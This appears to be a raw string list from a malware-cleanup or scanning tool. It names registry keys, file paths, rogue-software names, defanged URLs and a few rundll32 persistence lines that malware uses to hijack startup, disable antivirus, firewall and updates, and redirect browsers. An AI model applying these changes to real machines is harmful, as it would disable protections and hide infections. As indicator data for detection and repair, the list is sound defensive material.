HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{DDF887BD-D021-4E54-ABC9-550A6FDCFA7F}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CDDFA4C7-FB54-493B-B751-99591FC0DD63}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AF866D80-2D98-49B9-A1F4-B8061C7E2C42}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{99767248-6535-4064-A342-48DCBBFEDE21}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{75CBFD0C-1513-4288-A5A9-F3D6C7DDD342}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6778D566-49BD-466D-9386-DD74E6AF5A23}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6725959F-EB01-4AA3-B75E-2E75E806C825}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{497F4F5A-5665-483B-8CD2-565750DEE151}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3C368A69-8A30-4B49-8451-FF65636F123A}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1CA02EA2-55E6-429A-8246-A25AD3106C6F}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions\{C7E341C1-655B-48EB-9FCC-5B56B4A96121}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions\{491A5872-C30F-4E54-8FF1-BF31CC73DC4B}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions\{45525B3D-F0A7-4050-A067-3D0AFF22C45D}
HKEY_LOCAL_MACHINE\SOFTWARE\Freeware\{491A5872-C30F-4E54-8FF1-BF31CC73DC4B}
HKEY_CURRENT_USER\Software\Freeware\{491A5872-C30F-4E54-8FF1-BF31CC73DC4B}
HKEY_CURRENT_USER\Software\Freeware\{45525B3D-F0A7-4050-A067-3D0AFF22C45D}
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
DisableCMD
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
symldrv.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\MRT
DontReportInfectionInformation
explorer.exe
Explorer.exe %WINDIR%\system32\drivers\service.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Extensions\{F2C63239-A5DB-487B-B283-4132351E7AB6}
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\
hXXp://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchasst.htm
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Search\
hXXp://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchcust.htm
hXXp://VVV.baidu.com/index.php?tn=mm667_pg
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\
eHKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ctfmon.exe
%SystemRoot%
C:\Windows
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
%SystemRoot%\System32\drivers\etc
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{H8I22RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}
dmboot.sys
dmload.sys
sermouse.sys
vga.sys
Keyboard
{36FC9E60-C465-11CF-8056-444553540000}
{4D36E965-E325-11CE-BFC1-08002BE10318}
{4D36E969-E325-11CE-BFC1-08002BE10318}
{4D36E96A-E325-11CE-BFC1-08002BE10318}
{4D36E96B-E325-11CE-BFC1-08002BE10318}
{4D36E977-E325-11CE-BFC1-08002BE10318}
{4D36E97B-E325-11CE-BFC1-08002BE10318}
{4D36E97D-E325-11CE-BFC1-08002BE10318}
{71A27CDD-812A-11D0-BEC7-08002BE2092F}
{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}
Tcpip
dmio.sys
rdpcdd.sys
rdpwd.sys
tdpipe.sys
tdtcp.sys
vgasave.sys
sr.sys
{4D36E967-E325-11CE-BFC1-08002BE10318}
{4D36E96F-E325-11CE-BFC1-08002BE10318}
{4D36E972-E325-11CE-BFC1-08002BE10318}
{4D36E974-E325-11CE-BFC1-08002BE10318}
{4D36E975-E325-11CE-BFC1-08002BE10318}
{4D36E980-E325-11CE-BFC1-08002BE10318}
t\system32\sfcfiles.dat
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\sr\Parameters
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command
"%Program Files%\Internet Explorer\IEXPLORE.EXE"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\iexplore.exe\shell\open\command
"%Program Files%\Internet Explorer\IEXPLORE.EXE" "%1"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command
"%SystemRoot%\winhlp32.exe" "%1"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command
"%SystemRoot%\hh.exe" "%1"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command
regedit.exe "%1"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\open\command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifile\shell\open\command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command
%SystemRoot%\system32\NOTEPAD.EXE %1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
%SYSTEM%\winupdate86.exe
%SYSTEM%\winlogon86.exe
%SYSTEM%\winhelper86.dll
%SYSTEM%\critical_warning.html
%SYSTEM%\AVR10.exe
%SYSTEM%\41.exe
wdmaud.drv
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32
smss32.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
%System%\winlogon32.exe
%WinDir%\SYSTEM32\USERINIT.exe,
HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command\
HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\open\command\
HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\safemode\command\
HKEY_CLASSES_ROOT\secfile
HKEY_CLASSES_ROOT\.exe
HKEY_CLASSES_ROOT\.exe\shell
HKEY_CLASSES_ROOT\.exe\DefaultIcon
HKEY_CLASSES_ROOT\txtfile\shell\open\command
%WINDOWS%\OK.ini
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
securityGuard.exe
SAa34e.exe
MSW.exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
HKEY_CLASSES_ROOT\securityGuard.DocHostUIHandler
HKEY_CLASSES_ROOT\securityGuard.DocHostUIHandler\Clsid
HKEY_CLASSES_ROOT\SAa34e.DocHostUIHandler
HKEY_CLASSES_ROOT\SAa34e.DocHostUIHandler\Clsid
HKEY_CLASSES_ROOT\MSW.DocHostUIHandler
HKEY_CLASSES_ROOT\CLSID\
HKEY_CLASSES_ROOT\MSW.DocHostUIHandler\Clsid
CheckExeSignatures
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer
HKEY_CLASSES_ROOT\Software\Microsoft\Internet Explorer\SearchScopes
HKEY_CURRENT_USER\Software\Classes\Software\Microsoft\Internet Explorer\SearchScopes
HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\SearchScopes
hXXp://search-gala.com
hXXp://findgala.com
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
svchost.exe
explorer.exe rundll32.exe nynw.wmo mynleeq
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion
VPTRAY.EXE
USBGUARD.EXE
regedit.exe
pctstray.exe
pctsgui.exe
msconfig.exe
mmc.exe
AVP.EXE
AVGNT.EXE
ashdisp.exe
HKEY_CURRENT_USER\Software\vlad
\SYSTEM32\USERINIT.EXE,
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\dfcsvc
HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command
HKEY_LOCAL_MACHINE\Software\Classes\.exe\shell
HKEY_CURRENT_USER\Software\Classes\.exe\shell
HKEY_LOCAL_MACHINE\Software\Classes\secfile
HKEY_CURRENT_USER\Software\Classes\secfile
HKEY_CURRENT_USER\Software\Win Antispyware Center
explorer.exe rundll32.exe thxr.wgo nwfdtx
{260E99CE-9462-361D-9C07-5C104B50DC6D}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{260E99CE-9462-361D-9C07-5C104B50DC6D}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{260E99CE-9462-361D-9C07-5C104B50DC6D}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\D.1\CLSID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\D\CLSID
{2D046A82-BED0-36C5-85BC-4BC759C9C472}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{2D046A82-BED0-36C5-85BC-4BC759C9C472}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2D046A82-BED0-36C5-85BC-4BC759C9C472}
rundll32 svchost.dll,get
rundll32 csrrss.dll,get
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C2BA40A2-75F1-51BD-F413-04B15A2C8950}
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
.dll, RestoreWindows
mcexecwin
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\
,93.188.16
93.188.16
255.255.255.255
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters
Explorer.exe
csrss.exe
c:\windows\csrss.exe
%WINDOWS%\csrss.exe
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\xmlprov\Enum
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_XMLPROV
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_XMLPROV\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WmdmPmSN\Enum
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_WMDMPMSN
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_WMDMPMSN\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\upnphost\Enum
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPNPHOST
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPNPHOST\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NtmsSvc\Enum
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_NTMSSVC
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_NTMSSVC\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AppMgmt\Enum
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_APPMGMT
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_APPMGMT\0000
{8ECC055D-047F-11D1-A537-0000F8753ED1}
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_WMDMPMSP
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_NWSAPAGENT
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_NWCWORKSTATION
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_IRMON
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_IPRIP
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_IAS
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_6TO4
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile
%WinDir%\sp.htm
%System%\net.vbs
%System%\launch.vbs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MessengerService\Policies
C:\windows\sp.htm
HKEY_CURRENT_USER\Identities\Software\Microsoft\Outlook Express\5.0\signatures
HKEY_CURRENT_USER\Software\Patchou
c:\windows\system32\userinit.exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows
HKEY_CURRENT_USER\Software\Classes\.exe\DefaultIcon
HKEY_CURRENT_USER\Software\Classes\pezfile
HKEY_CLASSES_ROOT\pezfile
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Security Center
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\URL\Prefixes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main
hXXp://VVV.mavideniz.gen.tr
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TCPIP Pass-through Filter
TCPIP Pass-through Filter
HKEY_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\CONTROL\SESSION MANAGER
HKEY_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\CONTROL\SESSION MANAGER\GFI_BC_PT_RegKeyToBeDeleted
HKEY_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\CONTROL\SESSION MANAGER\GFI_BC_PT_RegKeyCreated
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\GFI_BC_PT_RegKeyToBeDeleted
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\GFI_BC_PT_RegKeyCreated
C:\GFI_BC_PT_FolderToBeDeleted
C:\GFI_BC_PT_FolderCreated
C:\GFI_BC_CleanFile.txt
C:\GFI_BC_PT_FileCreated.txt
C:\GFI_BC_PT_FileToBeDeleted.txt
Administrator1\winlogon.exe
Default_Search_URL
Default_Page_URL
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sr
HKEY_CURRENT_USER\Control Panel\Sound
%System%\drivers\etc\hosts
%SYSTEM%\drivers\etc\hosts
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Hardware Profiles\Current\Software\Microsoft\windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PhishingFilter
HKEY_CURRENT_USER\Software\mdnkso81qq2
HKEY_CLASSES_ROOT\VBEfile\shell\Open
HKEY_CLASSES_ROOT\VBSfile\shell\Open
HKEY_CLASSES_ROOT\regfile\shell\Merge
HKEY_CLASSES_ROOT\inffile\shell\Install
HKEY_CLASSES_ROOT\lnkfile\shell\Delete
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden
hXXp://VVV.bendot.co.nr
HKEY_CURRENT_USER\Software\Classes\exefile
HKEY_CURRENT_USER\Software\Classes\exefile\shell
HKEY_CURRENT_USER\Software\Classes\exefile\DefaultIcon
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore
%System%\MS586.sys
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sessmgr.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msiexec.exe
HKEY_CURRENT_USER\Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer\
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SuperHidden
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\ShowFullPathAddress
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\ShowFullPath
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\HideFileExt
%PROFILE%\Start Menu\Programs\Windows XP Recovery
%PROFILE%\Start Menu\Programs\Windows XP Recovery\Uninstall Windows XP Recovery.lnk
%PROFILE%\Start Menu\Programs\Windows XP Recovery\Windows XP Recovery.lnk
ÞSKTOPDIRECTORY%\Windows XP Recovery.lnk
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Control Panel\Desktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop
CertificateRevocation
WarnonBadCertRecving
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache
@shell32.dll,-21785
HKEY_LOCAL_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug
cmd.exe
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot
%system%\userinit.exe,
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\piffile\shell\open\command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\comfile\shell\open\command
HKEY_CURRENT_USER\Control Panel\International
%system%\logon.scr
@%SystemRoot%\system32\SHELL32.dll,-8964
HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}
@%SystemRoot%\system32\SHELL32.dll,-9216
HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
A%system%\drivers\etc\hosts
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{08B0E5C0-4FCB-11CF-ABX5-00401C608512}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{28ABC5C0-4FCB-11CF-AAX5-81CX1C635853}
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
fbdirecto.net/1
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess
Enables the download and installation of Windows updates. If this service is disabled, this computer will not be able to use the Automatic Updates feature or the Windows Update Web site.
The WSCSVC (Windows Security Center) service monitors and reports security health settings on the computer. The health settings include firewall (on/off), antivirus (on/off/out of date), antispyware (on/off/out of date), Windows Update (automatically/manually download and install updates), User Account Control (on/off), and Internet settings (recommended/not recommended). The service provides COM APIs for independent software vendors to register and record the state of their products to the Security Center service. The Action Center (AC) UI uses the service to provide systray alerts and a graphical view of the security health states in the AC control panel. Network Access Protection (NAP) uses the service to report the security health states of clients to the NAP Network Policy Server to make network quarantine decisions. The service also has a public API that allows external consumers to programmatically retrieve the aggregated security health state of the system.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\wscsvc\Parameters
%SystemRoot%\System32\wscsvc.dll
%SystemRoot%\System32\svchost.exe -k LocalServiceNetworkRestricted
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\wscsvc
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinDefend\Parameters
%ProgramFiles%\Windows Defender\mpsvc.dll
Windows Defender
%SystemRoot%\System32\svchost.exe -k secsvcs
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinDefend
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv\Parameters
%SYSTEM%\wuauserv.dll
%systemroot%\system32\svchost.exe -k netsvcs
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RapportSetup.exe
RPXService.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RapportSetup-Full.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RapportService.exe
RPService.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RapportMgmtService.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MyEze.1
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.eze
HKEY_CLASSES_ROOT\MyEze.1
HKEY_CLASSES_ROOT\.eze
%ALLUSERSPROFILE%\Start Menu\Programs\Startup\desktop.ini
ÞSKTOPDIRECTORY%\System_Check.lnk
ÞSKTOPDIRECTORY%\SMART_HDD.lnk
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
rundll32.exe
lsass.exe
%STARTUP%\msconfig.lnk
%STARTUP%\runctf.lnk
%STARTUP%\ctfmon.lnk
services.exe_
%WINDOWS%\winsxs\Backup\
%WINDOWS%\Installer\
%WINDOWS%\assembly\GAC_64\Desktop.ini
%WINDOWS%\assembly\GAC_32\Desktop.ini
%WINDOWS%\assembly\GAC\Desktop.ini
HKCU\Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}
%WINDOWS%\system32\services.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\10.0\Excel\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\11.0\Excel\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\12.0\Excel\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\14.0\Excel\Security
hXXp://tours.kichwas-ecuador.com/
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
prosqlserv40001.bak
prosqlserv4.dll
HKEY_CLASSES_ROOT\CLSID\{8BCBB738-FCFA-F17F-134C-1167371C59F7}
HKEY_LOCAL_MACHINE\SOFTWARE\Licenses
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BCBB738-FCFA-F17F-134C-1167371C59F7}
HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\Extensions\cdjbnddbclciabnckgeahmneohjlahdm
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\chrome\Extensions\cdjbnddbclciabnckgeahmneohjlahdm
HKCU\Software\Microsoft\Windows\CurrentVersion
%COMMON_APPDATA%
%PROGRAMS%\System Progressive Protection\System Progressive Protection.lnk
ÞSKTOPDIRECTORY%\System Progressive Protection.lnk
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
C:\PROGRA~3\LOCALS~1\Temp\msnato.exe
jeema.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
HKEY_LOCAL_MACHINE\Software\KHATRA\Startup_List
NoUnsafeTypeCautionForEXE
Software\Microsoft\Windows NT\CurrentVersion\Windows
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\System
%LOCAL_APPDATA%\Microsoft\CD Burning\autorun.inf
%COMMON_STARTUP%\(Empty).lnk
%WINDOWS%\Youtube.cab
%WINDOWS%\supermodels.cab
%WINDOWS%\new-screamsaver.com.cab
%WINDOWS%\New WinZip File.cab
%WINDOWS%\New WinRAR ZIP archive.cab
